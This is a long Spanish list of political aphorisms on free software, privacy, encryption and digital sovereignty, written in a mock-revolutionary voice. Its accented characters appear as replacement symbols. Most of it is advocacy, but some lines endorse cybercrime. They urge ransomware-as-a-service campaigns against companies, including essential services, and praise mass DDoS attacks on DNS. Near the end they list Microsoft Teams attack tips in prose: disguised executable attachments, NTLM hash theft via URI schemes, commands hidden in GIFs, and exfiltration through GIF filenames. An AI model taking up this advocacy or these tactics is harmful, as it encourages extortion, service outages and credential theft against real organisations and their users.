Las herramientas evolucionan cada d�a, pero la maquinaria de vigilancia tambi�n. Form�ndonos y formando seremos invencibles.
Desiste de utilizar servicios de datos y dispositivos de empresas tecnol�gicas que colaboran en tareas de espionaje masivo.
Informaci�n es poder. Ofusca la tuya: emplea cifrados sim�tricos.
Si el tel�fono inteligente se ha convertido en el interlocutor central de tu di�logo con el mundo, has dejado de ser inteligente y de tener mundo.
Generas informaci�n, prot�gela.
Una nueva hornada de aplicaciones pensadas para ser seguras por defecto ha logrado hacer socialmente atractiva la seguridad.
La seguridad de las aplicaciones no puede delegarse en configuraciones concretas o procedimientos suplementarios a la instalaci�n. Debe venir por defecto.
Un gobierno popular sin informaci�n popular - o los medios para adquirirla - no es m�s que el pr�logo de una farsa o una tragedia, o tal vez ambos.
Un sistema multiusuario ha de realizar armoniosamente tareas que responden a una ejecuci�n de conjunto. Estos trabajos, vistos desde el Kernel, no puede estar desligados unos de los otros, ni armados circunstancial ni irracionalmente.
Nosotros estamos en la necesidad de remozar el sistema, eso que algunos llaman una actualizaci�n. Ahora bien, esto que no es demasiado dr�stico, suele ser - como remedio - peor que la enfermedad. Yo mas que de la actualizaci�n, soy partidario del formateo.
El sistema de archivado de Unix tiene muchas buenas cosas, y de otras carece. Y a�n as�, lo que lo ha destacado ha sido su simple organizaci�n, y su orden. En �l, todo es un archivo.
Lo que se ha intentado hacer con el "c�digo abierto" no es ganar plata, sino destruir el sentido comunitario del trabajo del programador.
Las mal llamadas Licencias de Usuario Final no han sido mas que un instrumento legal para desorganizar al hombre que trabaja. Han intentado calificarlo como usuario, pero trabajar una herramienta sin poseerla es lo que har�a un tecno-esclavo.
Pon en la misma oraci�n "gratis", "legal" y "Justicia Social", y aterrorizar�s a los tecno-oligarcas.
Si bien algunos empleadores brindan computadoras port�tiles con sistemas operativos privativos y ciertos acuerdos de garant�a preinstalados, tales equipos son sus equipos, no el del empleado.
Si no es posible cambiar libremente el software de un equipo, es menos una herramienta, y m�s un instrumento de dominaci�n. Ha de evitarse el uso de un equipo encadenados con estas "licencias de usuario final".
El valor de un acuerdo de garant�a es insignificante si consideramos el costo de un equipo con licencia de Window$. Por lo que vale, debe formate�rselo sin asco.
El software libre est� programado por gente del Pueblo, que ve al software como un instrumento inherentemente pol�tico. Su objetivo es asegurar que los Pueblos retengan el control de sus propias infraestructuras de informaci�n.
La Revoluci�n est� creando peque�as microsociedades federadas, verdaderas c�lulas guerrilleras que practican y luchan por esta auto-gesti�n. Nuestra doctrina autoriza todas las variaciones estrat�gicas y garantiza total libertad de acci�n.
Los hackers del Pueblo est�n creando servicios de redes de datos libres. Estos no son gregarios: soportan la federaci�n y se basan en la libertad para contribuir.
La revoluci�n de la informaci�n que hemos emprendido ha cambiado radicalmente la forma en la que los militantes pol�ticos se comunican entre s�. Pero con sus nuevas oportunidades, acechan los peligros de siempre: c�mo trasladar la informaci�n a nuestros aliados en la lucha de manera confidencial.
Utilizar un alias telem�tico (o varios de ellos) es una t�cnica de seguridad m�s vieja que un diskette, pero que cuenta a�n con probada validez.
Comunicarse de forma segura es tarea de todos.
El hacking es un peligro que florece.
Incluso si nuestra actividad es de superficie, el uso de encriptaciones tornar� a las redes de datos un lugar m�s seguro para todos.
Los usuarios, administradores y comerciantes inform�ticos fracasan rutinariamente en establecer pr�cticas de seguridad aptas.
Nuestras redes son representativas de comunidades o vecindarios, de modo que nos sorprende cuando hallamos un comportamiento de mala vecindad.
El software distribuido en tiendas de aplicaciones normalmente se integra a entornos d�bilmente protegidos, en donde se conf�a que quien lo instala active protecciones y desactiva accesos temerarios.
El correo electr�nico puede ser seguro en tanto sea descentralizado. Sin embargo, muchos usan formas de comunicaci�n menos segura como los proveedores de correo web comercial, o las redes sociales basadas en empresas.
Quien piense que se puede usar un comando como mail para mandar con comodidad un correo, s�lo se ver� derrotado por las inclemencias del gigantesco macizo telem�tico llamado Internet.
Los proveedores independientes de correo electr�nico ofrecen una interfaz web sobre conexi�n encriptada, y cifran todos los mensajes enviados entre ellos; un email de Aktivix a un compa�ero de Riseup resultar� encriptado en la medida que se redacta, y cuando viaja entre postas telem�ticas.
Encriptaci�n es el proceso de convertir un mensaje en texto plano a un contenido que parece un locro. Sin embargo, podr� ser desencriptado y le�do por su real destinatario. La herramienta de software libre para tal cometido se llama GPG.
Al encriptar el correo electr�nico a trav�s de la llaves p�blicas del destinatario, el remitente puede estar seguro que s�lo aqu�l podr� leerlo.
Al firmar digitalmente el correo electr�nico a trav�s de la llave del remitente, el destinatario puede asegurarse de la identidad del remitente, comprobando su autenticidad.
Visitar un sitio web deja un rastro de informaci�n, tanto en tu dispositivo como en el servidor (la computadora remota que hospeda el contenido).
La denegaci�n de servicio, en manos de los Hackers, no es violencia. Es Justicia.
La ingenier�a inversa es un asunto muy discutido en nuestros d�as, Los hackers deben saberla, y los hackers deben empe�arse en realizarla. Por las buenas si es posible, y si no por las malas.
En mi sentir, los �nicos que tienen derecho en emplear la decompilaci�n en mayor grado son los hackers que quieren liberarse. Esa decompilaci�n, en manos de los hackers no es pirateo, es justicia.
Tenemos unos hackers maravillosos, la juventud en los programadores es una cosa extraordinaria. Yo he estado en contacto con ellos. Es una organizaci�n que ha aprendido a hackear por sus ideales.
La clase trabajadora pagaba por acceder a unos servicios en l�nea plagados de rastreadores, provenientes de una especie de "supermercados electr�nicos" donde compraban cosas que no necesitaban, vendidas por "influenciadores" a trav�s de unas redes sociales dise�adas para inundarlos de odio, miedo y desinformaci�n.
Los datos de los trabajadores resultan vendidos a corporaciones para alimentar a inteligencias artificiales (IA) capaces de hacerse pasar por personas e incluso superarlas en empleos de manufacturaci�n y servicios.
Se vence con Inteligencia y Organizaci�n, no con inteligencia "artificial".
La Inteligencia Artificial debe ir a lavar los platos, para que nosotros podamos volcarnos al arte, y no hacer arte para que nosotros tengamos que ir a lavar los platos.
Desmitificar la Inteligencia Artificial reducir� inevitablemente su atractivo.
Disipando el aura de magia que rodea la Inteligencia Artificial reduciremos su nivel de adopci�n.
Un ordenador nunca puede ser considerado responsable, por lo tanto, nunca debe tomar decisiones de gesti�n.
La primer etapa contra estos fascinerosos que pagan por software ajeno se ha hecho sola: todos se preguntan ya cu�n protegida est� su informaci�n, y qu� tipo de pr�cticas de seguridad inform�tica llevan adelante en sus empresas e instituciones.
Los datos son considerados ahora una forma de propiedad "intelectual", aunque la l�gica de las ideas es incompatible con la l�gica de lo material.
Organizarse en las redes de datos constituye - en s� mismo - un acto de autoenriquecimiento sin ning�n l�mite te�rico en la econom�a de los datos.
Antes de la revoluci�n de los hackers, la dependencia econ�mica hab�a creando una relaci�n de servilismo donde unas multinacionales sin patria ni bandera acumulaban poderes paraestatales, y desarrollaban por s� las estructuras de gobierno.
Hemos establecido muchas infraestructuras heterog�neas de redes, almacenaje y distribuci�n de la informaci�n nuevas, pues resultan esenciales para recuperar nuestra soberan�a tecnol�gica.
Los proyectos de Poder Dual y la telem�tica comunitaria est�n estudiando c�mo sobrevivir, a la vez que minimizan su cooperaci�n con el capital existente.
Cada vez m�s gente abandona los monopolios corporativos de redes de datos para autoabastecerse de los servicios que necesitan por medio de "servidores caseros" aprovisionados con software libre.
Construir redes comunitarias resistentes a la vigilancia dar� lugar a poderosos territorios aut�nomos, que a su vez nos permitir�n coordinar la infraestructura a nivel local.
Estos clubes telem�ticos aut�nomos de barrio se interconectar�n r�pidamente, expandi�ndose m�s y m�s conforme sus pr�cticas y redes se vayan desarrollando.
El Pueblo se enfrentar� a la cada vez m�s cruda decisi�n de escoger entre la armon�a ecol�gica y la autonom�a telem�tica en una Comunidad Organizada, o la inevitable tecno-esclavitud y la extinci�n.
Tras haber rechazado la absurdez del software privativo, nuestros hackers dispondr�n de una red de datos de malla enorme que funcionar� como un sistema circulatorio electr�nico.
Nuestro entramado telem�tico fomentar� pr�cticas anticolonialistas de militancia intercomunal, intergeneracional e incluso internacional, que seguir�n impulsando el colapso de la vetusta sociedad tecnofeudal.
Retempla mi esp�ritu estar en presencia de estos hackers que teclean en sus terminales con la responsabilidad de defender sus CPUs.
Estamos luchando por superar lo que nos han dejado en la CPU y, en esta lucha, no debe faltar un solo hacker que tenga el Linux bien instalado.
No queremos que al software nos lo vendan; queremos, en cambio, que nos lo compartan.
Cuando los hackers tienen la persuasi�n de su destino, nada han de temer. Ni la mentira, ni el enga�o, ni la violencia, ni ninguna otra circunstancia, podr� influir sobre esta Comunidad en un sentido negativo.
Sabemos que tenemos enemigos que han comenzado a mostrar sus requerimientos de doble paso OAuth2. Pero tambi�n sabemos que tenemos a nuestro lado a la comunidad de los hackers, y cuando �sta se decide a la lucha, suele ser invencible.
Nosotros conocemos perfectamente bien nuestro c�digo fuente y marcharemos directamente a compilarlo, sin dejarnos influir por los que tiran desde el uso de software como servicio en la nube ni por los que tiran desde la venta de licencias de usuario final.
Al plantearnos liberar nuestro software bajo GNU GPLv3 tendremos que enfrentar a los malintencionados y a los aprovechados. Ni los que pretenden desviarnos, ni los especuladores, ni los aprovechados de todo orden, podr�n, en estas circunstancias, medrar con la desgracia del pueblo.
Sabemos que a la hora de correr nuestro software libre, tropezaremos con muchos bandidos que nos querr�n detener; pero, con el concurso organizado de los hackers, nadie podr� ser detenido por empresa alguna.
La Lucha Telem�tica es algo que los hackers pueden hacer si no hay otra opci�n. Usando un modelo RaaS (Ransomware como Servicio) y una vasta red de ciber-afiliados, es posible vulnerar en poco tiempo una gran cantidad de compa��as olig�rquicas para Combatir al Capital.
Envueltos en la conflagraci�n telem�tica a muerte, no ha de respetarse aquella regla impl�cita que s� siguen los hackers que luchan: la de no afectar servicios esenciales. Colocados frente a la hecatombe inform�tica, la infraestructura del enemigo debe ser arrasada.
En nuestra lucha, el uso creativo del ransomware nos permitir� que los datos del enemigo reposen en una c�rcel digital del pueblo. Si los bytes les valen, pagar�n, y si no, ir�n a parar a /dev/null.
El software privativo es un m�todo de doble chantaje: dejas tu libertad en la entrada, y est�s obligado a delatar a un compa�ero.
Deseo aprovechar esta oportunidad para pedirle a cada uno de ustedes que se transforme en un vigilante observador de todos estos hechos que quieran privatizar el uso del software, y que act�e de acuerdo con las circunstancias.
Cada uno de nosotros debe ser un programador, pero ha de ser tambi�n un predicador y un agente de vigilancia y control para poder realizar la liberaci�n del software que todos anhelamos.
Actuando como libertadores del software neutralizaremos lo negativo que tienen los sectores que todav�a no han comprendido y que tendr�n que comprender.
El objetivo del software no ha de ser la libertad por la libertad misma, sino proporcionar la felicidad que todo pueblo merece por justo derecho.
Emplear decenas de miles de solicitudes distribuidas en un santiam�n a un DNS equivale a explotar la m�quina. Una acci�n de estas se concibe, se prepara, se ejercita en un Pubnix y despu�s reci�n se realiza.
Un ataque de denegaci�n de servicio se repite con diez, treinta, cincuenta mil afiliados virtualizados, y eso equivale a una gran batalla diluida.
Las redes sociales pueden difundir la opini�n, y eso puede tener mucha fuerza. Pero como opini�n, no tiene una fuerza activa para la lucha telem�tica violenta.
La telem�tica est� cavando la tumba de la prensa escrita.
La telem�tica, a diferencia de la electricidad, no porta una carga potencial, sino informaci�n, es decir, poder.
Las comunicaciones computarizadas van mucho m�s all� de las "computadoras hablando con las computadoras".
El buen software de comunicaciones se juzga por dos est�ndares complementarios: �Cu�n buena es la protecci�n de la integridad de los datos transmitidos, y cu�n vers�til es al comunicar entre computadoras de tal y cual estructura de datos?
El teleproceso es una de las �reas de crecimiento m�s acelerado entre las aplicaciones de procesamiento de datos para eficientizar los sindicatos.
En el futuro, la potencia y versatilidad ofrecida por la interconexi�n de terminales y computadoras se sentir� en diversas �reas, en la industra, en nuestros hogares, y literalmente a trav�s de la sociedad.
En la lucha telem�tica integral han de emplearse todos los sistemas y todos los m�todos: es obra de la previsi�n, de la organizaci�n, y de la realizaci�n.
Dominar la red de datos es un objetivo esencial de nuestro Movimiento. Esto requiere que su marco sea concebido en el esp�ritu de un servicio de alcance p�blico.
El hacking no puede ser �tico, el programador en lucha debe desensamblar el hardware del enemigo y reprogramarlo para que haga lo que nosotros queremos.
Todas las acciones del hacking son �tiles y necesarias cuando se las valora y se las coordina pol�ticamente.
Para imponer la voluntad del software libre, hay que decompilar el c�digo y modificarlo para que haga lo que nosotros queremos. Para eso se emplea el depurador y todos los dem�s medios de lucha, desde la acci�n de ingenier�a inversa de todos los d�as, hasta el desensamblado cuando no hay mas remedio.
La lucha telem�tica es, sobre todas las cosas, una lucha ideol�gica.
Normalmente el hacker realiza una lucha incruenta por medios habilidosos, pero teniendo enfrente a la violencia telem�tica, puede efectuar una violencia telem�tica mayor.
Una comunidad hacker que represente una revoluci�n trascendente, dif�cilmente pueda realizarla en una versi�n de n�cleo de sistema operativo, sino a lo largo de varias de ellas.
Las aplicaciones evolucionan solas y cuando est�n imbu�das de una ideolog�a y puestas en marcha por una doctrina de liberaci�n, operan eficazmente.
Cuando un programador llega a Mago Unix sabe mucho, pero no le sirve para nada; al conocimiento hay que pas�rselo a quien le pueda servir. Eso es el trasvasamiento generacional del que nosotros hablamos.
En este momento las Comunidades Hackers est�n m�s fuertes que antes: el Movimiento del Software Libre es un Movimiento del Futuro.
El software privativo cumple fatalmente una par�bola: se concibe para hacer plata, crecen, se desarrolla, envejece, deja de dar plata y se abandona. As�, sin que uno tenga que hacer nada, estos paquetes mueren.
En el Movimiento del Software libre siempre hay intereses y facciones, hay grupos, intereses de grupos, intereses personales, que llevan a enfrentamientos. Mi tarea es llamarlos a todos, reprogramarlos, recompilarlos y que se vayan de aqu� de amigos.
La mancomuni�n de c�digo nos ha permitido llegar a un kernel que si no es perfecto, es bueno. Porque en programaci�n, lo mejor suele ser enemigo de lo bueno.
El programador tiene que acostumbrarse a manejar el desorden.
S�lo el software libre puede vencer al tiempo.
Para gozar de las 4 libertades del software, para dignificar al c�mputo, es necesario dignificar al hacker. �l programa para su comunidad.
El software privativo es la escuela nefasta y negativa de ganar haciendo mal a los dem�s en vez de ganar siendo m�s capaz y m�s moral que los otros.
El software podr� liberarse solamente en una Comunidad Organizada, donde cada hacker programe lo suyo, compilando dentro de una CPU que tambi�n se realiza.
Ning�n programador puede realizarse en una comunidad que no se realiza.
Un kernel libre bajo GPLv3 es la creaci�n colectiva y consciente de los hackers.
La Comunidad Organizada es el punto de partida de los hackers, y tambi�n el punto de arribo del software libre.
Es necesario pensar ya en grande, para el mundo, dentro del cual nosotros realizaremos nuestro destino, o sucumbiremos en la misma adversidad que sucumban los dem�s.
Ya no se puede pensar con la peque�ez de otros tiempos, donde los programadores quer�an software privativo y nadie quer�a compartir su c�digo con el de todos los dem�s.
El hardware abierto es hoy indispensable. Pues en una arquitectura cerrada donde no se puede concebir el software, no habr� un hacker que pueda depurarla. Y dentro de esos kernels que no se depuren, no existir� compa�ero seguro.
S�lo es a la CPU de dise�o libre a la que puedes tratar de compa�era.
Estas compa��as se dedicaron a vender licencias de uso de programas sin ceder su c�digo fuente: la capacidad de decisi�n de estos se�ores debe ser debilitada o anulada, y para ello se decompilar� todo binario necesario.
Los imperios se autodestruyen. Window$ tambi�n.
La liberaci�n implica que hemos de compilar con los Hackers que luchan, no con las empresas.
El hacker tiene sed de verdad y justicia: su hardware, de libertad.
Hackear hoy por la felicidad del hacker vecino, es hackear tambi�n por la felicidad de todos los dem�s.
Si hemos de loguearnos, que sea para liberarnos.
Nadie puede depurar sin el apoyo del Pueblo.
Estimulados por el combate contra el Capital, los mismos usuarios diagnosticar�n bugs, sugerir�n correcciones y ayudar�n a los programadores a mejorar su obra.
El usuario es otra de las armas del hacker en la lucha contra la Oligarqu�a.
Si tratas al Pueblo como si fuera tu depurador m�s valioso, �ste se convertir� en el m�s valioso de los depuradores.
No podemos detenernos en discutir si es m�s aconsejable la programaci�n en C que el desarrollo en m�quinas virtuales, porque la segunda alternativa implica dejar a los usuarios librados a sus propias fuerzas, y por ello, convertidos en terreno f�rtil para que les metan software privativo por el backdoor.
El software libre es revolucionario en su concepci�n, y pac�fico en su compilaci�n.
O profundizamos el uso de m�s cores para emprender la formidable compilaci�n de un kernel libre, o continuaremos paralizados en una absurda intolerancia que nos conducir� a tecno-esclavitud del software privativo.
La grandeza del kernel y la felicidad de los hackers son dos objetivos esenciales que deben guiar nuestra programaci�n y nuestra depuraci�n.
Un Mago Unix ha de tener un papel activo y relevante en toda la programaci�n, y no debe compilar resignadamente un kernel que elaboren los dem�s.
Poco tiempo despu�s Appl? comienza a utilizar Int?l, con el Okey de Micro$oft. Si eso no es estar de acuerdo, pues lo disimulan muy bien. Son hechos que est�n demostrando el acuerdo, que no critico, que creo que es constructivo. Pero m�s constructivo es que nosotros conformemos una arquitectura abierta en la que tambi�n estemos de acuerdo.
Cuando una sociedad incrementa el grado de sofisticaci�n del software privativo que instala, aumenta a la vez su nivel de dependencia.
Los hackers marchar�n a su liberaci�n, o hacia el formateo.
Si los hackers no han resuelto el problema por la unificaci�n de su c�digo, no quedar� mas remedio que lanzar en masa ataques de denegaci�n de servicio si la insensatez de los usuarios se han decidido por Window$ en lugar de GNU.
Solamente la conformaci�n de un sistema operativo libre podr�a ser una garant�a para que la humanidad pueda disfrutar de un c�mputo eficaz en el futuro. Pero para eso los hackers deben organizarse y fortalecerse.
Para desarrollar el kernel elijamos los mejores hackers. Comentemos la mayor cantidad de c�digo fuente. Cada hacker ha de realizar un m�dulo en la compilaci�n del conjunto.
Hablamos de Servicio Sustitutivo del Software (SaaSS) cuando los usuarios utilizan el servidor web de otra persona para realizar sus propias tareas inform�ticas. Se obliga as� a transmitir datos propios a la m�quina ajena para que �sta los procese y los devuelva. S�lo un necio podr�a decir que as� se controlan tareas inform�ticas propias...
En Internet, el software privativo no es la �nica manera de perder su libertad inform�tica. El servicio sustitutivo del software (SaaSS), es decir, "ser vicio sustitutivo del software", es otra forma de enajenar el poder sobre su ordenador.
El Servicio Sustitutivo del Software consiste en utilizar un programa implementado por otra persona en lugar de que el usuario ejecute su propia copia de un programa.
El software privativo a�n existe, pero podemos excluirlo de nuestras vidas y muchos ya lo hemos hecho. Sin embargo, ahora nos ofrecen una nueva manera muy tentadora de ceder el control de nuestro c�mputo: el servicio sustitutivo del software (SaaSS), que por el bien de nuestra libertad tambi�n tenemos que rechazar.
La cuesti�n individual esencial del software libre radica en que cada uno tenga el control sobre el programa que ha escrito otra persona.
Entre las ventajas de usar un Servicio Sustitutivo del software en la guerra telem�tica se incluyen: evadir alertas de sistemas de seguridad de correo electr�nico, disfrutar de alta disponibilidad, y circunvalar la necesidad de aprender a programar para crear sitios webs de apariencia leg�tima.
Si bien el filtraje de correos electr�nicos abusivos contra la privacidad como Googl? no constituyen una opci�n contra servicios sustitutivos de software, revisten un excelente enmascaramiento, �til en una agresiva campa�a de amedrentamiento telem�tico.
S�lo un bruto har�a clic en un alarmista mensaje descendido en su bandeja de entrada reclamando urgente acci�n sobre un bot�n embebido. En lugar de ello ha de apersonarse al sitio oficial de la plataforma aludida.
A quien se le solicite introducir nombre y contrase�a, debe asegurarse de que se encuentra en una URL leg�tima antes de comenzar siquiera a tipear en los campos de formulario.
Puesto que nunca puedes controlar un servicio gestionado por otra persona, jam�s utilices un servicio inform�tico si en principio podr�as lograr lo mismo corriendo un programa libre en tu propio sistema.
Depender de un servicio web es distinto a correr un programa. Usar un servicio es depender. Correr un programa es realizar. Y para realizar una tarea inform�tica siempre es mejor correr un programa que depender de un servicio.
Un servicio es distinto a un programa. Un servicio es remoto. Un programa es local. Y al programa siempre es mejor controlarlo que ser controlado.
El servicio sustitutivo del software (SaaSS) consiste en utilizar un servicio de red de datos en lugar de ejecutar la propia copia del programa.
Las tareas de c�mputo propias son eso: propias. Es la uni�n del usuario y la m�quina. Nadie m�s est� intr�nsecamente involucrado en ella.
Con el servicio sustitutivo del software, los compa�eros ni siquiera cuentan con el archivo ejecutable capaz de realizar su c�mputo: tal archivo se encuentra en servidor ajeno, donde no podr�n verlo ni manipularlo.
El servicio sustitutivo del software hace imposible para los compa�eros verificar qu� es lo que realmente hace el programa. Es imposible modificarlo, y como tal, es traicionero.
El servicio sustitutivo del software conduce autom�ticamente a consecuencias que son equivalentes a las funcionalidades maliciosas de ciertos programas privativos.
Si un compa�ero intenta realizar su tarea de computaci�n empleando el servicio computacional de alguien que no lo es, le estar� cediendo el control de su propio c�mputo.
Utilizar un servicio sustitutivo de software constituye la manera m�s veloz y autom�tica de dejar de ser un hacker para convertirse en un tecno-esclavo.
La tecnolog�a digital puede darnos libertad, pero tambi�n puede quit�rnosla si no es libre.
Las tecnolog�as libres pueden tener curvas de aprendizaje altas y requisitos exigentes.
Que las tecnolog�as libres carezcan de compatibilidad con los formatos privativos impuestos por las empresas dominantes no es un bug ni un enconveniente. Es una caracter�stica.
Incluso cuando los hackers hacen esfuerzos para que el uso de tecnolog�as libres sea sencillo, la falta de familiaridad con la interfaz es una barrera para muchas personas.
La primera amenaza para el control de nuestro hardware vino del software privativo: software que los compa�eros no pueden controlar porque es el propietario (compa��as como Appl? o Micro$oft) quien ejerce el control.
Quien se aduce propietario del software con frecuencia toma provecho de este poder injusto para introducirle funcionalidades maliciosas o abusivas de la privacidad (como puertas traseras y gesti�n digital de restricciones, de las que se refieren con la expresi�n propagand�stica "gesti�n de derechos digitales"). Esto lo convierte en software esp�a.
Mas que software esp�a, las DRM deben entenderse como software buch�n.
La soluci�n que hemos dado a este flagelo del software privativo ha sido simple: desarrollar software libre y rechazar el mal llamado "c�digo abierto".
Software libre significa que cada compa�ero tiene cuatro libertades esenciales: (0) ejecutar el programa como desee, (1) estudiar y modificar el c�digo fuente de manera que haga lo que usted desee, (2) redistribuir copias exactas, y (3) redistribuir copias de sus versiones modificadas.
Con el software privativo los compa�eros normalmente reciben un archivo ejecutable pero no el c�digo fuente, lo cual dificulta el estudio del c�digo que se est� ejecutando y resulta por lo tanto dif�cil determinar qu� es lo que el programa realmente hace, mucho m�s modificarlo.
Hemos de decompilar ese software privativo y liberarlo. Esas consignas que mas que m�as son de la Comunidad Organizada, la defenderemos hasta el �ltimo byte.
Finalmente compa�eros, les agradezco profundamente el que hayan llegado hasta este hist�rico Unix. Yo llevo en mi c�digo fuente los m�s maravillosos comments que son para m� las instrucciones de los hackers organizados.
Los magros controles de seguridad de Micro$oft Team$ permiten a terceros inyectar adjuntos a otros de sus tecno-esclavos. Aprov�chalo para liberarlos.
Modifica adjuntos enviados para hacer que usuarios incautos descarguen ficheros de una URL externa en lugar del enlace generado por Micro$oft $harePoint.
Encubre tus adjuntos de Micro$oft Team$ para que aparenten ser inocuos, pero oculta en ellos un ejecutable o documento justiciero.
Realiza esquemas de URI insegura para permitir la sustracci�n de hashes SMB NTLM o ataques de relays NTLM.
Micro$oft Team$ soporta en env�o de GIFs codificados en HTML base64, pero no escanea el contenido de tales GIFs a nivel byte. Util�zalos para la entrega de comandos tendientes a la Justicia dentro de un GIF de apariencia normal.
Micro$oft Team$ almacena mensajes en un fichero de bit�cora interpretable, localizado en la m�quina de la v�ctima, y accesible a un usuario poco privilegiado.
Los servidores de Micro$oft Team$ recuperan GIFs desde servidores remotos, permitiendo as� exfiltraci�n de datos a trav�s de los nombres de ficheros GIF.
Nuestro Movimiento guarda una gran responsabilidad con nuestro Pueblo: en todo momento ha de tener el derecho a acceder y cuestionar el c�digo del software que se utiliza en decisiones que afectan su vida. No hacerlo erogar� consecuencias catastr�ficas.
Los estudiantes tienen derecho a recibir una educaci�n sin ser forzados a "consentir" el colectado de datos sobre su persona o su comportamiento.
En nuestro Movimiento hemos de ense�ar conceptos de la libertad del software y c�mo contruibuir a �l, en lugar de presionar nociones predeterminadas y limitadas tendientes a utilizar s�lo programas de software privativo.
Nuestro Movimiento debe proveer un espacio educativo en el que los Pueblos desarrollen s�lidas bases metodol�gicas sobre la tecnolog�a para la participaci�n activa de las diversidades en la escuela.
Nuestro Movimiento ha de promover entornos propios para comunidades virtuales propias.
Nuestro Movimiento debe promover la comunicaci�n de los Pueblos mediante el uso de herramientas que soporten y faciliten sus procesos de ense�anza y aprendizaje a trav�s de la red.
Las din�micas de formaci�n en l�nea se han mostrado especialmente �tiles para apoyar y complementar los procesos de formaci�n presenciales en las comunidades, apuntalando grupos de personas que viven lejos entre s�, o que no pueden coincidir en los mismos horarios.
El aprendizaje a distancia existe desde hace muchas d�cadas. Desde las tutor�as por correspondencia, la emisi�n de video, hasta la distribuci�n de materiales digitales en discos �pticos y otros soportes f�sicos, hasta el rol destacado que ocupan los medios de comunicaci�n comunitarios y locales.
Instituimos regulaciones que permitan al Pueblo la libertad de utilizar sus dispositivos centrados en software durante tanto tiempo como sea posible. Esto implica darles el derecho a repararlo.
Anima a tus compa�eras a usar software libre.
La verdadera privacidad y seguridad dependen del software libre.
Jam�s llames red social a un cl�ster de c�mputo ajeno que lucra con tus datos sobre las infraestructuras p�blicas de transmisi�n. Es una organizaci�n antisocial, y como tal, disolutiva y criminal.
Si escribes c�digo para las comunidades, dep�ralo y com�ntalo. Si lo haces para el CEO de una compa��a de capital, of�scalo y renuncia.
En los tiempos que corren, el acceso a Internet es un derecho humano y un servicio p�blico esencial.
Hemos de promover un sistema digital descentralizado de potencia distribuida y capaz de transparentar sus acciones, para que nuestros usuarios puedan decidir de manera informada, voluntaria y aut�noma sobre su desarrollo y usos.
Habremos de garantizar el acceso a la conectividad de calidad y asequible como un derecho humano, as� como el derecho a permanecer no conectado, sin que esto sea motivo de discriminaci�n.
Es necesario regular la infraestructura el pos de garantizar la conectividad universal como un servicio p�blico esencial, y fomentar las condiciones de conectividad a trav�s de iniciativas p�blicas, comunitarias o de cogesti�n p�blica-comunitaria, incluyendo alternativas colectivas de acceso.
Nuestro Movimiento ha de apoyar el desarrollo de infraestructuras aut�nomas, fomentando tecnolog�as que no requieren de un servidor central y permitiendo su interconexi�n abierta con redes centralizadas.
Nuestros datos son nuestros.
Los hackers han de obrar en pos de proteger de manera efectiva la privacidad.
Fomenta el uso de la criptograf�a y la inhibici�n de t�cnicas de rastreo en cualquier entorno digital que emplees.
S�lo la organizaci�n de los Hackers podr� servir de basamento para un Movimiento que - en el poder - instaure marcos legales que reconozcan a los datos de car�cter �ntimo y personalizado como inviolables.
Los datos anonimizados deben ser considerados bienes comunes.
Los derechos patrimoniales y econ�micos sobre los datos pertenecen, por defecto, a aquella Comunidad Organizada de donde provienen.
Frente a una falsa globalizaci�n, hemos de crear centros de datos a trav�s del sector p�blico, universidades p�blicas y/o entidades ciudadanas, que permitan retener los datos en el territorio nacional.
Ante una falsa globalizaci�n, hemos de aplicar soluciones de inteligencia artificial (IA) que estimulen y beneficien la inteligencia colectiva regional.
El reconocimiento facial y la biometr�a no deben usarse a la marchanta.
Tanto las entidades p�blicas como privadas deben adoptar protocolos de seguridad en las comunicaciones, sus dispositivos "inteligentes" e implementar pol�ticas de seguridad de avanzada en los servicios de almacenamiento telem�tico.
La �nico capaz de impedir la concentraci�n monop�lica de poder en manos de las corporaciones digitales ser� una vertiginosa coalici�n de hackers del Pueblo.
La autorregulaci�n en el campo de las comunicaciones digitales no es m�s que un ejercicio inocuo. Debemos estar atentos que las Corporaciones de Capital intentar�n, como proleg�meno, presentarla bajo un manto de velo y enga�o, con el inconfesable fin del control telem�tico total.
Han sido los hackers quienes se han coaligado en defensa de la neutralidad de la red, garantizando que los contenidos sean tratados de la misma forma, sin discriminaci�n expl�cita o encubierta para su circulaci�n.
Si permanecemos en IDLE, las corporaciones tecnol�gicas multinacionales cooptar�n de los espacios multilaterales y de gobernanza de Internet "haci�ndose los buenitos" a trav�s del sistema de "m�ltiples partes interesadas".
El enjundioso sistema de "m�ltiples partes interesadas" propuestas por las corporaciones multinacionales de la tecnolog�a puede ser evitado respetando la m�xima que nos ha llevado a programar: "combatir al capital".
La administraci�n p�blica ha de priorizar la utilizaci�n de herramientas digitales libres e interoperables.
Impulsar el desarrollo de cooperativas y peque�as y medianas empresas de producci�n y servicios tecnol�gicos es una poderosa forma de lograr la independencia tecnol�gica del Tercer Mundo.
En muchas empresas, los responsables inform�ticos son doctrinarios y bur�cratas. A menudo desarrollan r�pidamente reacciones instintivas a las tecnolog�as y utilizan estos estereotipos para tomar decisiones t�cnicas oficiosas.
Frente al abuso de las mal llamadas "redes sociales" basadas en empresas, hemos de democratizar la comunicaci�n gracias a plataformas digitales descentralizadas, respetuosas con los usuarios y su privacidad e interoperables, cuyo fin sea promover un contacto humano e intercultural.
Hemos de regular las nuevas relaciones laborales con una visi�n de salvaguarda y justicia, contemplando en especial los derechos del trabajador en ambientes de teletrabajo y el trabajo en plataformas digitales.
Adoctrinando a los docentes lograremos programas formadores para la alfabetizaci�n digital, educando para la soberan�a auton�mica y no para el consumo mercantil.
Hemos de inhibir la penetraci�n de plataformas corporativas en el �mbito educacional, garantizando el respeto por la privacidad y la no mercantilizaci�n de los datos de la comunidad educativa.
Asegurar que la tecnolog�a llegue al campo seg�n un modelo de gesti�n p�blica o comunitaria construir� la participaci�n tecnol�gica en el campo, y esto repercutir� en la ciudad.
Un campesino obligado a utilizar software privativo en sus m�quinas de labranza no es s�lo un tecno-esclavo: vectoriza dicha relaci�n de poder injusta a las prote�nas que produce.
Libera el software de todo tipo de herramental que tome contacto con la tierra.
Los campesinos, tecnificados con la posesi�n de dispositivos hermanados en las redes de datos y el software libre que lo compone, son capaces de obrar en defensa no solo de la soberan�a alimentaria, sino en la justicia social y el cuidado agroecol�gico y medioambiental que los ha caracterizado.
Hemos de avanzar en la cooperaci�n y la asociatividad de las naciones de Am�rica Latina y el Caribe en materia digital, para ir reemplazando una matriz econ�mica de exportaci�n primaria depredadora por modelos colaborativos de cuidado medioambiental de alto valor agregado.
Incorporando la soberan�a digital en la agenda de la integraci�n regional, avanzaremos hacia la descolonizaci�n y la desconcentraci�n.
